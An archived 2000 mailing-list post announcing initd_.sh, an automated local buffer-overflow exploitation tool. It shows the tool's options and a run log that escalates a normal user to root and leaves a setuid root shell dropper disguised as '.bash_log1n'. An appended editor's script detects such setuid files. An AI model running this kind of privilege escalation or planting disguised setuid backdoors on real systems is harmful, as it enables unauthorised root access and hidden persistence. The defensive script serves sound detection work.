Subject: New Tool: initd_.sh;
From: zaboo.ma.fu
Date: Tue Sep 05 2000 - 00:17:15 CDT


/*** Attachment did not send... resending (sorry for the bulk) ***/
Heyas ;)
    I wrote this tool in the last couple of days to see if I could actually implement a program that would automatically attack local binaries and attempt to find exploits in respect to buffer overflows via command line switches.
    Despite the script's simplicity I do believe it is a powerful tool that will aid in securing any Linux box, although I refuse to blindly advertise this as an end-all be-all to local security. As I note in the readme there are numerous discrepancies that limit the program's strength; however, _most_ (if not all) of these issues will be resolved in upcoming releases of this program.
    Instead of explaining the entire process and capability I'll just paste the --help output at the end of this message. Also I'll paste an example usage for fun ;D
    This program is a first of its kind as far as I know ;) I'm pretty excited to see the response I get from the community.
    Portability to as many operating systems as possible will be integrated asap; however, it will take a week or two as I am generating the configurable shellcode myself (something I have never done before at this level).
    Anyway, I hope you enjoy this beta release!

Sincerely,
    initd_
    initd_digital.net
    0x7F Security Research

Restless eyes and erratic blue flicker
While devilish fingers dance and slither
The sound of electricity, relentless, hums....
....When something wicked this way comes
    - initd_'s verse >;)

---- Help Output ----
seychelles.initd_ % ./initd_.sh
 Note: For further explanation on switches consult documentation
 usage: initd_.sh [options]
 options:
 -t filename Define the target binary as 'filename'
 --min_buffer int Define minimum buffer size as 'int'
 --max_buffer int Define maximum buffer size as 'int'
 --jmp_buffer int Define buffer increment value as 'int'
 --min_offset int Define minimum offset size as 'int'
 --max_offset int Define maximum offset size as 'int'
 --jmp_offset int Define offset increment value as 'int'
 --tmp_dir dir Force all tmp files to be written to 'dir'
 --rsd_dir dir Force the RSD directory to be 'dir'
 --rsdct_dir dir Force the RSDCT directory to be 'dir'
 --et_dir dir Force the ET directory to be 'dir'
 --uid int Force user id of target binary to 'int'
 --gid int Force group id of target binary to 'int'
 -n Do not query program for command line switches
 -s switches Pass a quoted string of switches to test
 -q Switch messaging to quiet mode
 -v Increase program verbocity (3 levels max)
 --help | -h Display program usage
 Send comments/questions/bugs to: initd_digital.net
 0x7f Security Research Team: Dangerously Deadicated. . .
--- EOHelp ---
phoenix.initd_ % id
uid=1000(initd_) gid=100(users) groups=100(users)
phoenix.initd_ % ./initd_.sh -t ../../../INITD_2000.08.24/ex
--min_buffer 1024 -v -v -v
 #
 # initd_.sh
 # Automated Exploitation Tool v0.0.3
 #
 # 0x7f Security Research: Something Wicked This Way Comes...
 #
 [+] Target Confirmed
 [+] Binary is not stripped
 [+] Strip has been located. Exploit stealth has increased
 [+] Confirmed temp directory
 [+] RSD Directory confirmed
 [+] Configuring for a Linux system on a i586 chip
 [ ] Owner of target is root
 [ ] Group name of target is root
 [+] User id # determined to be 0
 [+] Group id number determined to be 0
 [ ] Creating the Root Shell Dropper
 [+] RSD Creation Successful
 [ ] Creating Root Shell Dropper Configuration Tool
 [+] RSDCT Creation Successful
 [ ] Creating Exploitation Tool
 [+] ET Creation Succeeded
 [ ] Current Switch: -s
 [ ] Current Buffer Size: 1024
 [ ] Current Offset: -100
 [ ] Current Offset: 0
 [ ] Current Offset: 100
 [ ] Current Offset: 200
 [ ] Current Offset: 300
 [ ] Current Offset: 400
 [+] Executing Cleanup
 [+] Cleanup Complete
 [ ] Welcome to the Dark Side
sh-2.02# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.02# exit
exit
phoenix.initd_ % ls -la
total 38
drwxr-xr-x 2 initd_ users 1024 Sep 5 01:05 .
drwxr-xr-x 4 initd_ users 1024 Sep 5 00:31 ..
-rwsr-sr-x 1 root root 3192 Sep 5 01:05 .bash_log1n
-rw-r--r-- 1 initd_ users 9863 Sep 5 00:30 Readme
-rwxr-xr-x 1 initd_ users 21313 Sep 5 00:22 initd_.sh
phoenix.initd_ %
---EOF---

Enjoy ;)
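Editor's note: the transcript above ends with the tool's "Root Shell Dropper" leaving a root-owned setuid/setgid file with a misleading name (`.bash_log1n`) in the user's own directory. The script below is an added defender-side check, not part of initd_'s post or tool: it reports setuid/setgid files under directories a local user can write to, matching on mode bits rather than names. The directory list at the bottom is an assumed example and should be adapted to the system.

```shell
#!/bin/sh
# Added example (not from the original post): list regular files under the
# given directories that carry the setuid or setgid bit. The transcript above
# shows such an artifact: "-rwsr-sr-x 1 root root ... .bash_log1n" in a home
# directory. Names are attacker-chosen, so we match on permission bits only.
#
# Usage: find_suid_files DIR [DIR...]
# Output: one line per hit, "<mode> <owner> <group> <path>"
find_suid_files() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        # -type f skips setgid directories, which are normal; -xdev stays on
        # one filesystem so a scan of /home does not wander into mounts.
        find "$d" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
    done | while IFS= read -r f; do
        # GNU stat gives mode/owner/group; fall back to ls fields elsewhere.
        if stat -c '%A %U %G %n' "$f" 2>/dev/null; then :; else
            ls -ld "$f" | awk '{print $1, $3, $4, $NF}'
        fi
    done
}

# Number of hits, so a cron job or monitoring agent can alert on "any
# setuid/setgid file in a user-writable area" (expected baseline: 0).
count_suid_files() {
    find_suid_files "$@" | wc -l | tr -d ' '
}

# Interactive run over the usual user-writable areas (assumed list; adjust).
if [ "${1:-}" = "--run" ]; then
    find_suid_files /home /tmp /var/tmp
fi
```

Run it as `sh find_suid.sh --run` from a root cron job; any hit in these directories deserves a look, whoever owns it.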